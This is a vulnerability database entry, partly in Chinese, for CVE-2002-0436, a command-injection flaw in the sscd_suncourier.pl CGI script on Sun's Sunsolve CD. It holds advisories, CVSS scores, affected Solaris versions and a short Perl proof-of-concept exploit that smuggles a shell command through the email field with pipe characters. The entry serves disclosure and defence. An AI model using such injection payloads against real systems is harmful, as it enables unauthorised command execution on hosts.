CVE-2002-0436
CVSS10.0
发布时间 :2002-07-26 00:00:00
修订时间 :2008-09-05 16:28:01
NMCOES    

[原文]sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.


[CNNVD]Sun Sunsolve CD SSCD_SunCourier.pl可远程执行任意命令漏洞(CNNVD-200207-097)

        
        Sunsolve CD是作为Solaris Media pack文档资源的一部分,可用于Solaris环境下。
        CD中包含的一个CGI脚本存在输入验证错误,远程攻击者可能利用此程序漏洞在主机上执行任意命令。
        CD上的sscd_suncourier.pl脚本未对用户输入进行充分过滤,远程攻击者通过提交一个带有转义字符的email地址就可以在主机上以Web服务器进程的身份执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:8.0::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0436
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0436
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-097
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4269
(VENDOR_ADVISORY)  BID  4269
http://www.securityfocus.com/archive/1/261544
(VENDOR_ADVISORY)  BUGTRAQ  20020311 SunSolve CD cgi scripts...
http://www.iss.net/security_center/static/8435.php
(VENDOR_ADVISORY)  XF  sunsolve-cd-command-execution(8435)

- 漏洞信息

Sun Sunsolve CD SSCD_SunCourier.pl可远程执行任意命令漏洞
危急 输入验证
2002-07-26 00:00:00 2005-10-20 00:00:00
远程  
        
        Sunsolve CD是作为Solaris Media pack文档资源的一部分,可用于Solaris环境下。
        CD中包含的一个CGI脚本存在输入验证错误,远程攻击者可能利用此程序漏洞在主机上执行任意命令。
        CD上的sscd_suncourier.pl脚本未对用户输入进行充分过滤,远程攻击者通过提交一个带有转义字符的email地址就可以在主机上以Web服务器进程的身份执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时删除此程序或者取消它的执行权限。
        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sun.com

- 漏洞信息 (21340)

Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability (EDBID:21340)
cgi remote
2002-03-11 Verified
0 Fyodor
N/A [点击下载]
source: http://www.securityfocus.com/bid/4269/info

The Sunsolve CD is part of the Solaris Media pack. It is included as a documentation resource, and is available for the Solaris Operating Environment.

A CGI script included with the CD does not adequately sanitize input. Due to a design failure which does not remove special characters such as the pipe (|) character, a user submitting a malicious email address to the script could execute arbitrary commands with the permissions of the executing program. 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
ua = new LWP::UserAgent;
$ua->agent("Scrapers");
my $req = POST  'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl',
[
step =>  "submit" ,
emailaddr => "foo\@bar.com| id > /tmp/foo|"];
$res = $ua->request($req);
print $res->as_string;
print "code", $res->code, "\n";
		

- 漏洞信息

10598
Sun Sunsolve CD Pack sscd_suncourier.pl email Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

2002-03-11 Unknow
2002-03-11 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sun Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
Input Validation Error 4269
Yes No
2002-03-11 12:00:00 2009-07-11 11:56:00
Vulnerability discovery credited to Fyodor <fyarochkin@trusecure.com>.

- 受影响的程序版本

Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0

- 漏洞讨论

The Sunsolve CD is part of the Solaris Media pack. It is included as a documentation resource, and is available for the Solaris Operating Environment.

A CGI script included with the CD does not adequately sanitize input. Due to a design failure which does not remove special characters such as the pipe (|) character, a user submitting a malicious email address to the script could execute arbitrary commands with the permissions of the executing program.

- 漏洞利用

Exploit contributed by Fyodor &lt;fyarochkin@trusecure.com&gt;.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站